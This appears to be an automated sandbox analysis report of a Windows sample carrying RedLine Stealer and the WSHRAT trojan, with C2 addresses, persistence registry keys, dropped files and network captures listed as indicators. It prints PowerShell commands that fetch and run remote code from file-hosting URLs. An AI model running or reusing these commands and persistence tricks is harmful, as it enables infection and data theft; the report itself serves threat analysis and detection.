redline | f82e5e6ba614031d24cb1460149e658eb3b4b9b0372dda40989ea413feae185c

Analysis

max time kernel
151s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20/10/2022, 08:11 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
Size

4.1MB
MD5

803238fd75925bebb2d385b7c472b8f7
SHA1

0f06400fd1e6e0003e90e6e289ef53b968ddb6dd
SHA256

f82e5e6ba614031d24cb1460149e658eb3b4b9b0372dda40989ea413feae185c
SHA512

ceab74a27e52e29574a14b0ca0e66cb2fae8a6e0d6bb7a8f89aa7a66d5a918ba23bf3ae73cc1e5c00bb8c031ad6465208b6d3d40c07df882a681de7b46c692f9
SSDEEP

98304:vFEn+sPuptl3GCXOStfnCKWdZkkby1/++UIAr:vREupr/XO+CDdZPby1/ZUIe

Score

10^/10

redline wshrat infostealer persistence trojan

Malware Config

Extracted

Family

redline

45.87.155.189:20856

Attributes

auth_value
ac64e5ead391346e804f0d9ec2f18faa

Extracted

Language

ps1

Deobfuscated

1
invoke-expression (new-object "Net.Webclient").downloadstring("https://files.catbox.moe/3pwn9k.jpg")
2

URLs

ps1.dropper

https://files.catbox.moe/3pwn9k.jpg

Extracted

Family

wshrat

http://svchost.ydns.eu:8000

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/1568-176-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat

Blocklisted process makes network request 7 IoCs

flow	pid	Process
31	100	powershell.exe
34	1264	WScript.exe
35	2760	WScript.exe
36	1264	WScript.exe
41	2120	powershell.exe
43	2760	WScript.exe
44	1264	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
4436	Scr.exe
4264	ONLYFANS CHECKER.exe
2376	kl-plugin.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\User.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\User.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EsetNod32.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EsetNod32.js	WScript.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\User = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\User.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EsetNod32 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\EsetNod32.js\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EsetNod32 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\EsetNod32.js\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\User = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\User.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
32	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4264 set thread context of 1568	4264	ONLYFANS CHECKER.exe	95

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\ntdll.pdb	javaw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
4668	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	36	WSHRAT\|94D95F5C\|GBQHURCC\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 20/10/2022\|JavaScript-v2.0\|NL:Netherlands
HTTP User-Agent header	44	WSHRAT\|94D95F5C\|GBQHURCC\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 20/10/2022\|JavaScript-v2.0\|NL:Netherlands

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
100	powershell.exe
100	powershell.exe
2120	powershell.exe
2120	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	100	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	4668	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2376	kl-plugin.exe
2376	kl-plugin.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 4912 wrote to memory of 1264	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	84
PID 4912 wrote to memory of 1264	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	84
PID 4912 wrote to memory of 1264	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	84
PID 4912 wrote to memory of 2716	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	85
PID 4912 wrote to memory of 2716	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	85
PID 4912 wrote to memory of 4436	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	86
PID 4912 wrote to memory of 4436	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	86
PID 4912 wrote to memory of 4452	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	87
PID 4912 wrote to memory of 4452	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	87
PID 4912 wrote to memory of 4452	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	87
PID 4436 wrote to memory of 100	4436	Scr.exe	88
PID 4436 wrote to memory of 100	4436	Scr.exe	88
PID 4912 wrote to memory of 4264	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	90
PID 4912 wrote to memory of 4264	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	90
PID 4912 wrote to memory of 4264	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	90
PID 4912 wrote to memory of 2760	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	92
PID 4912 wrote to memory of 2760	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	92
PID 4912 wrote to memory of 2760	4912	F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe	92
PID 4452 wrote to memory of 2120	4452	WScript.exe	93
PID 4452 wrote to memory of 2120	4452	WScript.exe	93
PID 4452 wrote to memory of 2120	4452	WScript.exe	93
PID 4264 wrote to memory of 1568	4264	ONLYFANS CHECKER.exe	95
PID 4264 wrote to memory of 1568	4264	ONLYFANS CHECKER.exe	95
PID 4264 wrote to memory of 1568	4264	ONLYFANS CHECKER.exe	95
PID 4264 wrote to memory of 1568	4264	ONLYFANS CHECKER.exe	95
PID 4264 wrote to memory of 1568	4264	ONLYFANS CHECKER.exe	95
PID 1264 wrote to memory of 3624	1264	WScript.exe	96
PID 1264 wrote to memory of 3624	1264	WScript.exe	96
PID 1264 wrote to memory of 3624	1264	WScript.exe	96
PID 3624 wrote to memory of 4668	3624	cmd.exe	98
PID 3624 wrote to memory of 4668	3624	cmd.exe	98
PID 3624 wrote to memory of 4668	3624	cmd.exe	98
PID 1264 wrote to memory of 2376	1264	WScript.exe	99
PID 1264 wrote to memory of 2376	1264	WScript.exe	99
PID 1264 wrote to memory of 2376	1264	WScript.exe	99

C:\Users\Admin\AppData\Local\Temp\F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe
"C:\Users\Admin\AppData\Local\Temp\F82E5E6BA614031D24CB1460149E658EB3B4B9B0372DD.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\EsetNod32.js"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM kl-plugin.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4668
- - C:\Users\Admin\AppData\Roaming\kl-plugin.exe
    "C:\Users\Admin\AppData\Roaming\kl-plugin.exe" svchost.ydns.eu 8000 "WSHRAT|94D95F5C|GBQHURCC|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 20/10/2022|JavaScript-v2.0|NL:Netherlands" 1
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2376
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Java Plataform.jar"
  2⤵
  - Drops file in Program Files directory
  PID:2716
- C:\Users\Admin\AppData\Roaming\Scr.exe
  "C:\Users\Admin\AppData\Roaming\Scr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -c cd $env:tmp;Invoke-WebRequest https://files.catbox.moe/9jfjbh.png -OutFile Error.png;gc Error.png | iex
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:100
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Scr.VBS"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\ProgramData\rrrrrrrr.ps1"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe
  "C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:1568
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\User.vbs"
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Adds Run key to start application
  PID:2760

Network

DNS

files.catbox.moe

powershell.exe

Remote address:

8.8.8.8:53

Request

files.catbox.moe

IN A

Response

files.catbox.moe

IN A

107.160.74.131
GET

https://files.catbox.moe/9jfjbh.png

powershell.exe

Remote address:

107.160.74.131:443

Request

GET /9jfjbh.png HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: files.catbox.moe
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: nginx/1.21.3
Date: Thu, 20 Oct 2022 08:13:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=f4asa17vo2i0f5aq17dcsh0lsm; expires=Thu, 27-Oct-2022 08:13:38 GMT; Max-Age=604800; path=/; domain=.catbox.moe
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Refresh: 3; url=https://files.catbox.moe/9jfjbh.png
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
DNS

ip-api.com

WScript.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

svchost.ydns.eu

WScript.exe

Remote address:

8.8.8.8:53

Request

svchost.ydns.eu

IN A

Response

svchost.ydns.eu

IN A

57.128.45.1
GET

http://ip-api.com/json/

WScript.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Accept: */*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 20 Oct 2022 08:13:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
POST

http://svchost.ydns.eu:8000/is-ready

WScript.exe

Remote address:

57.128.45.1:8000

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|94D95F5C|GBQHURCC|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 20/10/2022|JavaScript-v2.0|NL:Netherlands
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Host: svchost.ydns.eu:8000
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
GET

https://files.catbox.moe/3pwn9k.jpg

powershell.exe

Remote address:

107.160.74.131:443

Request

GET /3pwn9k.jpg HTTP/1.1
Host: files.catbox.moe
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: nginx/1.21.3
Date: Thu, 20 Oct 2022 08:14:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=8ujfun7h32l0jla3dvnrrh82mh; expires=Thu, 27-Oct-2022 08:14:24 GMT; Max-Age=604800; path=/; domain=.catbox.moe
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Refresh: 3; url=https://files.catbox.moe/3pwn9k.jpg
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
POST

http://svchost.ydns.eu:8000/is-ready

WScript.exe

Remote address:

57.128.45.1:8000

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|94D95F5C|GBQHURCC|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 20/10/2022|JavaScript-v2.0|NL:Netherlands
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Host: svchost.ydns.eu:8000
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

88.221.25.154:80

46 B
40 B
1
1
93.184.220.29:80

322 B
7
95.101.78.82:80

322 B
7
95.101.78.82:80

322 B
7
104.80.225.205:443

322 B
7
51.11.192.48:443

322 B
7
209.197.3.8:80

260 B
5
209.197.3.8:80

322 B
7
209.197.3.8:80

322 B
7
209.197.3.8:80

322 B
7
107.160.74.131:443

https://files.catbox.moe/9jfjbh.png

tls, http

powershell.exe

984 B
6.0kB
10
11

HTTP Request

GET https://files.catbox.moe/9jfjbh.png

HTTP Response

302
208.95.112.1:80

http://ip-api.com/json/

http

WScript.exe

446 B
592 B
4
2

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
57.128.45.1:1000

svchost.ydns.eu

WScript.exe

260 B
5
57.128.45.1:8000

http://svchost.ydns.eu:8000/is-ready

http

WScript.exe

599 B
269 B
6
5

HTTP Request

POST http://svchost.ydns.eu:8000/is-ready
45.87.155.189:20856

AppLaunch.exe

260 B
5
107.160.74.131:443

https://files.catbox.moe/3pwn9k.jpg

tls, http

powershell.exe

889 B
6.0kB
10
11

HTTP Request

GET https://files.catbox.moe/3pwn9k.jpg

HTTP Response

302
45.87.155.189:20856

AppLaunch.exe

156 B
3
57.128.45.1:1000

svchost.ydns.eu

WScript.exe

156 B
3
57.128.45.1:8000

http://svchost.ydns.eu:8000/is-ready

http

WScript.exe

461 B
332 B
3
8

HTTP Request

POST http://svchost.ydns.eu:8000/is-ready

8.8.8.8:53

files.catbox.moe

dns

powershell.exe

62 B
78 B
1
1

DNS Request

files.catbox.moe

DNS Response

107.160.74.131
8.8.8.8:53

ip-api.com

dns

WScript.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

svchost.ydns.eu

dns

WScript.exe

61 B
77 B
1
1

DNS Request

svchost.ydns.eu

DNS Response

57.128.45.1

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rrrrrrrr.ps1

Filesize
437B

MD5
6fb3bcb1df4238202635b791907a2cc8

SHA1
e34888df4096c91096fc76599b8586a513feca7f

SHA256
8a92dfc83aa949a737624fb844dbcf0731b7cfa5bfb8e70a105f2a2b532cc06c

SHA512
2fbc0f082e542082a4dc54d72f922fe33ff50ed549874c4b82399321546a9485b1852e225d3272e0581fec8b6d8a2f7506db2cdb196ba465a878eca396782277

Download Submit
C:\Users\Admin\AppData\Roaming\EsetNod32.js

Filesize
712KB

MD5
3624e469765d60dfb5ef46d96504038a

SHA1
a42a61dc4d169e4b555702a8a45e8a49fbe11beb

SHA256
4cd6701682cc75c9581d720ff4f87db4bd1a4ec8bb6775bfe0fd2d66ebeb3465

SHA512
b196618a732d840619dcc0ac45a9b7205f7ff21cdb87c18bafdb9ae28bf8d5c06b1049f9227851588897ba24e6e3922a922aa291ef6d62323ee6121019ad6fa6

Download Submit
C:\Users\Admin\AppData\Roaming\Java Plataform.jar

Filesize
92KB

MD5
0bdc00b168aca259ac2cb22226673b51

SHA1
1fbe9e133cda80479ac441b77891c9049e6e43c1

SHA256
edc82523e7ff486f9b1ce56a27dfe724262578748a60fc94305cbc158db176c3

SHA512
26d1ed2bdfe26ba44466874ebf334213a5cb2c07a7f68cdb5dfbfb092f7960c4812e223bfe53daf8ac06b34b78ac6d3d11e80c51377b6f237fbe8125ad92a104

Download Submit
C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe

Filesize
3.9MB

MD5
6b62d1351a2513db98027b4ee9440a31

SHA1
7678ad8679e82c99ea35166027bb595ec8244c9e

SHA256
76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

SHA512
efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

Download Submit
C:\Users\Admin\AppData\Roaming\ONLYFANS CHECKER.exe

Filesize
3.9MB

MD5
6b62d1351a2513db98027b4ee9440a31

SHA1
7678ad8679e82c99ea35166027bb595ec8244c9e

SHA256
76e957be45c916f66c7cbaad91a73b44639e21141baf5d958907925beb91129b

SHA512
efb470ebdb522efdbd8b67404c81fd857e27d952bcef2c3e0d6f1dd336a8e58932a7f1083844523232d636e2b21875a4a2ba2248839f67d6c1561e4858509638

Download Submit
C:\Users\Admin\AppData\Roaming\Scr.VBS

Filesize
984B

MD5
986066708bacb494aade46fbfbe000fe

SHA1
665c06147c57d72eb6d1f2f38c6be141eb17c47e

SHA256
c581c944bf383522f361ed5695fbc9bf46476145e894c244a2fe830e8757a15f

SHA512
8ab3f43c93350642cb5b2d78e2d1f848933facd5f72f2a105b675858e72b9547291c1c5448433927f1ee859de245a9891dafbfc2de641bbacaf9e1a7b3ccc7e3

Download Submit
C:\Users\Admin\AppData\Roaming\Scr.exe

Filesize
4KB

MD5
6f8e34106a2a024f6961b5e166dfb57b

SHA1
183cecc7f4f29304474eb629c215fe23280b4611

SHA256
06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

SHA512
7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

Download Submit
C:\Users\Admin\AppData\Roaming\Scr.exe

Filesize
4KB

MD5
6f8e34106a2a024f6961b5e166dfb57b

SHA1
183cecc7f4f29304474eb629c215fe23280b4611

SHA256
06d48205d2491502fd82e050c880213a29039ee8c4dba7be9f84f19147d4ee66

SHA512
7b130286d62858c1c0e4908a8149cb9d5f47947d604b3bbdef42d6b34f6ce976bd431d80cde9a097b6a4a5f79e7971c287ca8428ab08d2e23448c91d652e0245

Download Submit
C:\Users\Admin\AppData\Roaming\User.vbs

Filesize
1.4MB

MD5
195176fece927e0f49c61aaeec356b5b

SHA1
5471ae64215ffdc266ae886bbace3b822655c339

SHA256
64399996339c31666bfd04dcaa039e509954f019f55279e4512e16626e693d1b

SHA512
73e6e383828cc9af57cc7a634b6d04c5ce720d54f64229fec1b4152c124164b2c901b7735de054069518d5faf5cd000f1dfd125412b2e41dce8540508ac84832

Download Submit
C:\Users\Admin\AppData\Roaming\kl-plugin.exe

Filesize
25KB

MD5
7099a939fa30d939ccceb2f0597b19ed

SHA1
37b644ef5722709cd9024a372db4590916381976

SHA256
272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

SHA512
6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

Download Submit
C:\Users\Admin\AppData\Roaming\kl-plugin.exe

Filesize
25KB

MD5
7099a939fa30d939ccceb2f0597b19ed

SHA1
37b644ef5722709cd9024a372db4590916381976

SHA256
272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

SHA512
6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

Download Submit
memory/100-172-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

Filesize
10.8MB

Download
memory/100-147-0x000001A226680000-0x000001A2266A2000-memory.dmp

Filesize
136KB

Download
memory/100-194-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

Filesize
10.8MB

Download
memory/100-151-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

Filesize
10.8MB

Download
memory/1568-192-0x00000000048F0000-0x000000000492C000-memory.dmp

Filesize
240KB

Download
memory/1568-190-0x00000000049C0000-0x0000000004ACA000-memory.dmp

Filesize
1.0MB

Download
memory/1568-188-0x0000000004E00000-0x0000000005418000-memory.dmp

Filesize
6.1MB

Download
memory/1568-176-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1568-189-0x0000000004890000-0x00000000048A2000-memory.dmp

Filesize
72KB

Download
memory/2120-198-0x0000000005C60000-0x0000000005C7A000-memory.dmp

Filesize
104KB

Download
memory/2120-191-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/2120-197-0x00000000072A0000-0x000000000791A000-memory.dmp

Filesize
6.5MB

Download
memory/2120-187-0x00000000054D0000-0x0000000005536000-memory.dmp

Filesize
408KB

Download
memory/2120-182-0x0000000002220000-0x0000000002256000-memory.dmp

Filesize
216KB

Download
memory/2120-183-0x0000000004C90000-0x00000000052B8000-memory.dmp

Filesize
6.2MB

Download
memory/2120-185-0x00000000052C0000-0x00000000052E2000-memory.dmp

Filesize
136KB

Download
memory/2120-186-0x0000000005460000-0x00000000054C6000-memory.dmp

Filesize
408KB

Download
memory/2376-202-0x000000006C2A0000-0x000000006C851000-memory.dmp

Filesize
5.7MB

Download
memory/2716-174-0x00000000032F0000-0x00000000042F0000-memory.dmp

Filesize
16.0MB

Download
memory/2716-164-0x00000000032F0000-0x00000000042F0000-memory.dmp

Filesize
16.0MB

Download
memory/4264-173-0x0000000000400000-0x0000000000A18000-memory.dmp

Filesize
6.1MB

Download
memory/4264-153-0x0000000000400000-0x0000000000A18000-memory.dmp

Filesize
6.1MB

Download
memory/4264-156-0x0000000000400000-0x0000000000A18000-memory.dmp

Filesize
6.1MB

Download
memory/4264-181-0x0000000000400000-0x0000000000A18000-memory.dmp

Filesize
6.1MB

Download
memory/4264-171-0x0000000002590000-0x00000000025F0000-memory.dmp

Filesize
384KB

Download
memory/4264-166-0x0000000000400000-0x0000000000A18000-memory.dmp

Filesize
6.1MB

Download
memory/4436-139-0x0000000000730000-0x0000000000738000-memory.dmp

Filesize
32KB

Download
memory/4436-152-0x00007FFCC3EF0000-0x00007FFCC49B1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.